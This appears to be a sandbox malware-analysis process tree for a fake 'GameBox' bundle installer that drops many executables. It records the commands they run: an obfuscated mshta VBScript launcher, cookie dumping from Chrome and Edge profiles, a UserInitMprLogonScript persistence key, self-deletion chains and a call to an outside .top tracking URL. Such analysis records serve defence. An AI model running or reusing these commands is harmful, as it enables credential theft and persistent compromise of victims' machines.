C:\Users\Admin\AppData\Local\Temp\is-UBK7I.tmp\MediaBurner2.tmp"C:\Users\Admin\AppData\Local\Temp\is-UBK7I.tmp\MediaBurner2.tmp" /SL5="$102DA,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"5⤵
- Executes dropped EXE
PID:4308 -
C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe"C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1496 -
C:\Users\Admin\AppData\Local\Temp\is-MJFDH.tmp\VPN.tmp"C:\Users\Admin\AppData\Local\Temp\is-MJFDH.tmp\VPN.tmp" /SL5="$2026C,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:4172 -
C:\Users\Admin\AppData\Local\Temp\is-0J70C.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-0J70C.tmp\Setup.exe" /silent /subid=7206⤵
- Executes dropped EXE
PID:4796 -
C:\Users\Admin\AppData\Local\Temp\is-BKILC.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-BKILC.tmp\Setup.tmp" /SL5="$1041A,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-0J70C.tmp\Setup.exe" /silent /subid=7207⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2220 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "8⤵PID:6496
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap09019⤵
- Checks SCSI registry key(s)
PID:7064 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "8⤵PID:5904
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap09019⤵PID:5596
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall8⤵PID:5596
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install8⤵PID:192
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵
- Executes dropped EXE
PID:4892 -
C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1968 -
C:\Users\Admin\AppData\Roaming\7015641.exe"C:\Users\Admin\AppData\Roaming\7015641.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4216 -
C:\Users\Admin\AppData\Roaming\2304792.exe"C:\Users\Admin\AppData\Roaming\2304792.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
PID:2136 -
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"6⤵
- Executes dropped EXE
PID:5012 -
C:\Users\Admin\AppData\Roaming\5567526.exe"C:\Users\Admin\AppData\Roaming\5567526.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4376 -
C:\Users\Admin\AppData\Roaming\4285606.exe"C:\Users\Admin\AppData\Roaming\4285606.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4652 -
C:\Users\Admin\AppData\Roaming\5707305.exe"C:\Users\Admin\AppData\Roaming\5707305.exe"5⤵
- Executes dropped EXE
PID:4584 -
C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
PID:4224 -
C:\Users\Admin\Documents\YPCv144pphZIylOARCmBKB2P.exe"C:\Users\Admin\Documents\YPCv144pphZIylOARCmBKB2P.exe"5⤵PID:4892
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im YPCv144pphZIylOARCmBKB2P.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\YPCv144pphZIylOARCmBKB2P.exe" & del C:\ProgramData\*.dll & exit6⤵PID:7268
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im YPCv144pphZIylOARCmBKB2P.exe /f7⤵
- Kills process with taskkill
PID:7948 -
C:\Windows\SysWOW64\timeout.exetimeout /t 67⤵
- Delays execution with timeout.exe
PID:6380 -
C:\Users\Admin\Documents\CxrdbnsYmJXIYC8ZCq3_eatq.exe"C:\Users\Admin\Documents\CxrdbnsYmJXIYC8ZCq3_eatq.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5032 -
C:\Users\Admin\Documents\UOOu7lNtPV4PNh_B7bK8DVoZ.exe"C:\Users\Admin\Documents\UOOu7lNtPV4PNh_B7bK8DVoZ.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4772 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4772 -s 16686⤵
- Program crash
PID:6904 -
C:\Users\Admin\Documents\81YOA98fWeBFjZfCfPZnz1R9.exe"C:\Users\Admin\Documents\81YOA98fWeBFjZfCfPZnz1R9.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4808 -
C:\Users\Admin\Documents\81YOA98fWeBFjZfCfPZnz1R9.exeC:\Users\Admin\Documents\81YOA98fWeBFjZfCfPZnz1R9.exe6⤵
- Executes dropped EXE
PID:5992 -
C:\Users\Admin\Documents\Yw8U_JxIWkXmT2vRB5edDPOf.exe"C:\Users\Admin\Documents\Yw8U_JxIWkXmT2vRB5edDPOf.exe"5⤵
- Executes dropped EXE
PID:4640 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4640 -s 6646⤵
- Program crash
PID:900 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4640 -s 6806⤵
- Program crash
PID:5664 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4640 -s 6846⤵
- Program crash
PID:4068 -
C:\Users\Admin\Documents\O5_mwR6IuhYz_5jqbMnXOb4H.exe"C:\Users\Admin\Documents\O5_mwR6IuhYz_5jqbMnXOb4H.exe"5⤵
- Executes dropped EXE
PID:4360 -
C:\Users\Admin\Documents\MuwqvsPFX96gdgOc_2BXvamW.exe"C:\Users\Admin\Documents\MuwqvsPFX96gdgOc_2BXvamW.exe"5⤵
- Executes dropped EXE
PID:4060 -
C:\Users\Admin\AppData\Roaming\5188343.exe"C:\Users\Admin\AppData\Roaming\5188343.exe"6⤵PID:7072
-
C:\Users\Admin\AppData\Roaming\2736613.exe"C:\Users\Admin\AppData\Roaming\2736613.exe"6⤵
- Suspicious behavior: SetClipboardViewer
PID:7116 -
C:\Users\Admin\AppData\Roaming\3155323.exe"C:\Users\Admin\AppData\Roaming\3155323.exe"6⤵PID:7152
-
C:\Users\Admin\AppData\Roaming\4437870.exe"C:\Users\Admin\AppData\Roaming\4437870.exe"6⤵PID:4992
-
C:\Users\Admin\Documents\3dStGRB5_5z5kl0pdXNKw8KC.exe"C:\Users\Admin\Documents\3dStGRB5_5z5kl0pdXNKw8KC.exe"5⤵
- Executes dropped EXE
PID:5208 -
C:\Users\Admin\Documents\3dStGRB5_5z5kl0pdXNKw8KC.exe"C:\Users\Admin\Documents\3dStGRB5_5z5kl0pdXNKw8KC.exe"6⤵PID:6312
-
C:\Users\Admin\Documents\3dStGRB5_5z5kl0pdXNKw8KC.exe"C:\Users\Admin\Documents\3dStGRB5_5z5kl0pdXNKw8KC.exe"6⤵PID:6308
-
C:\Users\Admin\Documents\xjs3mw1bN8Hgit2d0KxOTvr8.exe"C:\Users\Admin\Documents\xjs3mw1bN8Hgit2d0KxOTvr8.exe"5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5304 -
C:\Users\Admin\Documents\pAnyK8gwLEtBFe86bDDQpgWE.exe"C:\Users\Admin\Documents\pAnyK8gwLEtBFe86bDDQpgWE.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5292 -
C:\Users\Admin\Documents\pAnyK8gwLEtBFe86bDDQpgWE.exe"C:\Users\Admin\Documents\pAnyK8gwLEtBFe86bDDQpgWE.exe"6⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:4788 -
C:\Users\Admin\Documents\UanHfLTYCfJh6FZOc3I3aPBg.exe"C:\Users\Admin\Documents\UanHfLTYCfJh6FZOc3I3aPBg.exe"5⤵
- Executes dropped EXE
PID:5496 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5496 -s 4806⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:1780 -
C:\Users\Admin\Documents\KTcFnZEIePx9_JDVNUluPqJ3.exe"C:\Users\Admin\Documents\KTcFnZEIePx9_JDVNUluPqJ3.exe"5⤵
- Executes dropped EXE
PID:5484 -
C:\Users\Admin\Documents\v4BoW79EXHq0JCHzEMLzlDOC.exe"C:\Users\Admin\Documents\v4BoW79EXHq0JCHzEMLzlDOC.exe"5⤵
- Executes dropped EXE
PID:5468 -
C:\Users\Admin\Documents\v4BoW79EXHq0JCHzEMLzlDOC.exe"C:\Users\Admin\Documents\v4BoW79EXHq0JCHzEMLzlDOC.exe"6⤵PID:7712
-
C:\Users\Admin\Documents\Z7EzvH0MgGMru2S6_QCveS09.exe"C:\Users\Admin\Documents\Z7EzvH0MgGMru2S6_QCveS09.exe"5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5552 -
C:\Users\Admin\Documents\_bTcJNEFfnFAvmOWimWnKgBz.exe"C:\Users\Admin\Documents\_bTcJNEFfnFAvmOWimWnKgBz.exe"5⤵
- Executes dropped EXE
PID:5824 -
C:\Users\Admin\Documents\_bTcJNEFfnFAvmOWimWnKgBz.exe"C:\Users\Admin\Documents\_bTcJNEFfnFAvmOWimWnKgBz.exe" -q6⤵
- Executes dropped EXE
PID:6456 -
C:\Users\Admin\Documents\GtXuVpkHD1RR6DJ5OoRVbYiq.exe"C:\Users\Admin\Documents\GtXuVpkHD1RR6DJ5OoRVbYiq.exe"5⤵
- Executes dropped EXE
PID:5796 -
C:\Users\Admin\Documents\GtXuVpkHD1RR6DJ5OoRVbYiq.exe"C:\Users\Admin\Documents\GtXuVpkHD1RR6DJ5OoRVbYiq.exe"6⤵PID:8140
-
C:\Users\Admin\Documents\GtXuVpkHD1RR6DJ5OoRVbYiq.exe"C:\Users\Admin\Documents\GtXuVpkHD1RR6DJ5OoRVbYiq.exe"6⤵PID:6280
-
C:\Users\Admin\Documents\pcuoyDEm3RIoM0KqDfObZcmK.exe"C:\Users\Admin\Documents\pcuoyDEm3RIoM0KqDfObZcmK.exe"5⤵
- Executes dropped EXE
PID:3924 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im pcuoyDEm3RIoM0KqDfObZcmK.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\pcuoyDEm3RIoM0KqDfObZcmK.exe" & del C:\ProgramData\*.dll & exit6⤵PID:7700
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im pcuoyDEm3RIoM0KqDfObZcmK.exe /f7⤵
- Kills process with taskkill
PID:8004 -
C:\Windows\SysWOW64\timeout.exetimeout /t 67⤵
- Delays execution with timeout.exe
PID:7944 -
C:\Users\Admin\Documents\OBmVLVdD1gQBv_4OOmsJxLm5.exe"C:\Users\Admin\Documents\OBmVLVdD1gQBv_4OOmsJxLm5.exe"5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5260 -
C:\Users\Admin\Documents\S_Rhe1EMDrJRYwnYQ25ngnzV.exe"C:\Users\Admin\Documents\S_Rhe1EMDrJRYwnYQ25ngnzV.exe"5⤵
- Executes dropped EXE
PID:5424 -
C:\Users\Admin\Documents\o5Z0vVBgPoS6Nljy8ZhAYeqf.exe"C:\Users\Admin\Documents\o5Z0vVBgPoS6Nljy8ZhAYeqf.exe"5⤵
- Executes dropped EXE
PID:5312 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBscrIpT: ClOsE (CrEaTeobjeCt ( "WsCRIPt.SHELl"). RUN( "cmD.EXe /C coPy /y ""C:\Users\Admin\Documents\o5Z0vVBgPoS6Nljy8ZhAYeqf.exe"" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo &IF """" == """" for %j iN (""C:\Users\Admin\Documents\o5Z0vVBgPoS6Nljy8ZhAYeqf.exe"" ) do taskkill -im ""%~NXj"" -f " , 0, tRue ) )6⤵PID:6308
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C coPy /y "C:\Users\Admin\Documents\o5Z0vVBgPoS6Nljy8ZhAYeqf.exe" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo&IF "" == "" for %j iN ("C:\Users\Admin\Documents\o5Z0vVBgPoS6Nljy8ZhAYeqf.exe" ) do taskkill -im "%~NXj" -f7⤵PID:6928
-
C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.ExeZ2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo8⤵PID:7088
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBscrIpT: ClOsE (CrEaTeobjeCt ( "WsCRIPt.SHELl"). RUN( "cmD.EXe /C coPy /y ""C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe"" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo &IF ""-PMrvgB7ejl2YIjc3PC8aTZbo"" == """" for %j iN (""C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe"" ) do taskkill -im ""%~NXj"" -f " , 0, tRue ) )9⤵PID:6140
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C coPy /y "C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo&IF "-PMrvgB7ejl2YIjc3PC8aTZbo" == "" for %j iN ("C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe" ) do taskkill -im "%~NXj" -f10⤵PID:6056
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" .\HwWYSzK.F2,zgr9⤵PID:5760
-
C:\Windows\SysWOW64\taskkill.exetaskkill -im "o5Z0vVBgPoS6Nljy8ZhAYeqf.exe" -f8⤵
- Kills process with taskkill
PID:4404 -
C:\Users\Admin\Documents\dvTLQXItS4WQaW5zmJh6PYWK.exe"C:\Users\Admin\Documents\dvTLQXItS4WQaW5zmJh6PYWK.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
PID:4308 -
C:\Program Files (x86)\Company\NewProduct\jooyu.exe"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"6⤵
- Executes dropped EXE
PID:6404 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵PID:6056
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵PID:7668
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"6⤵
- Executes dropped EXE
PID:6396 -
C:\Program Files (x86)\Company\NewProduct\customer3.exe"C:\Program Files (x86)\Company\NewProduct\customer3.exe"6⤵
- Executes dropped EXE
PID:6388 -
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵PID:2392
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"7⤵PID:7240
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵PID:8164
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"7⤵PID:4592
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵PID:7196
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"7⤵PID:7256
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵PID:7396
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"7⤵PID:5020
-
C:\Users\Admin\Documents\SRk7lU6F4XwYIqXEt2lklni8.exe"C:\Users\Admin\Documents\SRk7lU6F4XwYIqXEt2lklni8.exe"5⤵
- Executes dropped EXE
PID:4132 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 6606⤵
- Program crash
PID:4292 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 6966⤵
- Program crash
PID:6288 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 7046⤵
- Program crash
PID:6780 -
C:\Users\Admin\Documents\dfTk1nJnIzatgWXDRYGmUx0a.exe"C:\Users\Admin\Documents\dfTk1nJnIzatgWXDRYGmUx0a.exe"5⤵
- Executes dropped EXE
PID:3964 -
C:\Users\Admin\Documents\OxkkM5SDGnR9IuyLRKAbWS5J.exe"C:\Users\Admin\Documents\OxkkM5SDGnR9IuyLRKAbWS5J.exe"5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1456 -
C:\Users\Admin\Documents\jG875JdywPh3NzDWK2TUJ_gd.exe"C:\Users\Admin\Documents\jG875JdywPh3NzDWK2TUJ_gd.exe"5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1512 -
C:\Users\Admin\Documents\gNuOqGKy1Yc8ILnt_07caihE.exe"C:\Users\Admin\Documents\gNuOqGKy1Yc8ILnt_07caihE.exe"5⤵PID:192
-
C:\Users\Admin\AppData\Local\Temp\is-PSJCM.tmp\gNuOqGKy1Yc8ILnt_07caihE.tmp"C:\Users\Admin\AppData\Local\Temp\is-PSJCM.tmp\gNuOqGKy1Yc8ILnt_07caihE.tmp" /SL5="$204E4,138429,56832,C:\Users\Admin\Documents\gNuOqGKy1Yc8ILnt_07caihE.exe"6⤵
- Loads dropped DLL
PID:6592 -
C:\Users\Admin\AppData\Local\Temp\is-2GK6T.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-2GK6T.tmp\Setup.exe" /Verysilent7⤵PID:7716
-
C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe"C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"8⤵PID:7848
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629494036 /qn CAMPAIGN=""710"" " CAMPAIGN="710"9⤵PID:4884
-
C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4148 -
C:\Users\Admin\AppData\Local\Temp\tmp5C5E_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp5C5E_tmp.exe"5⤵
- Executes dropped EXE
PID:4420 -
C:\Windows\SysWOW64\dllhost.exe"C:\Windows\System32\dllhost.exe"6⤵PID:5700
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks6⤵PID:3864
-
C:\Windows\SysWOW64\cmd.execmd7⤵PID:6808
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks8⤵PID:7080
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comEsplorarne.exe.com i8⤵PID:7080
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i9⤵PID:5436
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i10⤵PID:7020
-
C:\Windows\SysWOW64\PING.EXEping RJMQBVDN -n 308⤵
- Runs ping.exe
PID:3116 -
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1556 -
C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe"C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3872 -
C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe"C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2320
-
C:\Users\Admin\AppData\Local\Temp\is-JQ24N.tmp\Inlog.tmp"C:\Users\Admin\AppData\Local\Temp\is-JQ24N.tmp\Inlog.tmp" /SL5="$401E8,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:1068 -
C:\Users\Admin\AppData\Local\Temp\is-S21N5.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-S21N5.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 7212⤵
- Executes dropped EXE
PID:5412 -
C:\Users\Admin\AppData\Local\Temp\is-OPE8U.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-OPE8U.tmp\Setup.tmp" /SL5="$3045C,17366757,721408,C:\Users\Admin\AppData\Local\Temp\is-S21N5.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 7213⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
PID:6180 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-55GTN.tmp\{app}\microsoft.cab -F:* %ProgramData%4⤵PID:6600
-
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-55GTN.tmp\{app}\microsoft.cab -F:* C:\ProgramData5⤵
- Drops file in Windows directory
PID:7016 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f4⤵PID:6140
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f5⤵PID:4956
-
C:\Users\Admin\AppData\Local\Temp\is-55GTN.tmp\{app}\vdi_compiler.exe"C:\Users\Admin\AppData\Local\Temp\is-55GTN.tmp\{app}\vdi_compiler"4⤵PID:6364
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-55GTN.tmp\{app}\vdi_compiler.exe"5⤵PID:5904
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 46⤵
- Runs ping.exe
PID:7612 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^¶m=7214⤵PID:6156
-
C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"4⤵PID:5528
-
C:\Users\Admin\AppData\Local\Temp\is-CG72V.tmp\WEATHER Manager.tmp"C:\Users\Admin\AppData\Local\Temp\is-CG72V.tmp\WEATHER Manager.tmp" /SL5="$10280,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:2812 -
C:\Users\Admin\AppData\Local\Temp\is-4M2HC.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-4M2HC.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=7152⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
PID:4140 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-4M2HC.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-4M2HC.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629494036 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"3⤵PID:5572
-
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q1⤵
- Executes dropped EXE
PID:4792
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:4428 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:4188 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4188 -s 6243⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:384
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:1316 -
